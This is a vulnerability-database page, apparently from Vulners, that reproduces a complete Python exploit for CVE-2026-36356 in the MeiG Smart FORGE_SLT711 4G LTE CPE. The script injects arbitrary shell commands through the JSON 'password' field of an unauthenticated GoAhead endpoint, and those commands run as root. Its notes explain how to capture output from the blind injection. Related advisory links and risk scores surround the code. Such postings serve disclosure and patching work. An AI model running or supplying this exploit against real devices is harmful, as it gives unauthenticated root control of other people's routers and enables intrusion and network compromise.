Vulners
Lucene search
MeiG Smart FORGE_SLT711 - OS Command Injection
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Exploit for CVE-2026-36356 | 3 May 202620:57 | – | githubexploit |
 | CVE-2026-36356 | 5 May 202600:00 | – | attackerkb |
 | CVE-2026-36356 | 3 May 202621:00 | – | circl |
 | MeiG FORGE_SLT711 操作系统命令注入漏洞 | 5 May 202600:00 | – | cnnvd |
 | CVE-2026-36356 | 5 May 202600:00 | – | cve |
 | CVE-2026-36356 | 5 May 202600:00 | – | cvelist |
 | EUVD-2026-27327 | 5 May 202615:31 | – | euvd |
 | CVE-2026-36356 | 5 May 202614:16 | – | nvd |
 | 📄 MeiG Smart FORGE_SLT711 Command Injection | 29 May 202600:00 | – | packetstorm |
 | PT-2026-37044 | 5 May 202600:00 | – | ptsecurity |
10
# Exploit Title: MeiG Smart FORGE_SLT711 - OS Command Injection
# Date: 2026-05-03
# Exploit Author: Daniil Gordeev
# Vendor Homepage: http://www.meigsmart.com
# Software Link: N/A (firmware distributed via carrier channels)
# Version: Firmware MDM9607.LE.1.0-00110-STD.PROD-1 (likely all firmware versions of this product line)
# Tested on: MeiG FORGE_SLT711 (Ortel 4G LTE CPE), Qualcomm MDM9607, Linux 3.18.48
# CVE: CVE-2026-36356
"""
Unauthenticated RCE — MeiG FORGE_SLT711 (Ortel 4G LTE CPE)
GoAhead /action/SetRemoteAccessCfg OS command injection
Vuln: JSON "password" field → sprintf("echo root:\"%s\"|chpasswd") → system()
Auth: None (endpoint missing from route.txt auth list)
Root: Commands execute as uid=0(root)
Type: Blind — output not in HTTP response, use --cmd "cmd > /tmp/out" to exfil
Discovered: 2026-02-21
Tested on: FW MDM9607.LE.1.0-00110-STD.PROD-1
"""
import argparse
import json
import sys
import urllib.request
import urllib.error
def exploit(ip: str, cmd: str, port: int = 80, timeout: int = 10) -> bool:
url = f"http://{ip}:{port}/action/SetRemoteAccessCfg"
payload = json.dumps({"password": f"$({cmd})"})
req = urllib.request.Request(
url,
data=payload.encode(),
headers={"Content-Type": "application/json"},
method="POST",
)
try:
with urllib.request.urlopen(req, timeout=timeout) as resp:
body = resp.read().decode()
data = json.loads(body)
if data.get("retcode") == 0:
print(f"[+] retcode:0 — command executed as root")
return True
else:
print(f"[-] Unexpected response: {body}")
return False
except urllib.error.URLError as e:
print(f"[-] Connection failed: {e}")
return False
except Exception as e:
print(f"[-] Error: {e}")
return False
def main():
p = argparse.ArgumentParser(
description="MeiG SLT711 GoAhead unauthenticated RCE (blind)",
epilog="Example: %(prog)s --ip 192.168.1.1 --cmd 'id > /tmp/out'",
)
p.add_argument("--ip", default="192.168.1.1", help="Target IP (default: 192.168.1.1)")
p.add_argument("--port", type=int, default=80, help="Target port (default: 80)")
p.add_argument("--cmd", required=True, help="Command to execute as root (blind, no output returned)")
p.add_argument("--timeout", type=int, default=10, help="HTTP timeout in seconds (default: 10)")
args = p.parse_args()
print(f"[*] Target: {args.ip}:{args.port}")
print(f"[*] Command: {args.cmd}")
print(f"[*] Payload: $({{cmd}}) inside password field")
ok = exploit(args.ip, args.cmd, args.port, args.timeout)
sys.exit(0 if ok else 1)
if __name__ == "__main__":
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 May 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.19.1
EPSS0.15394
SSVC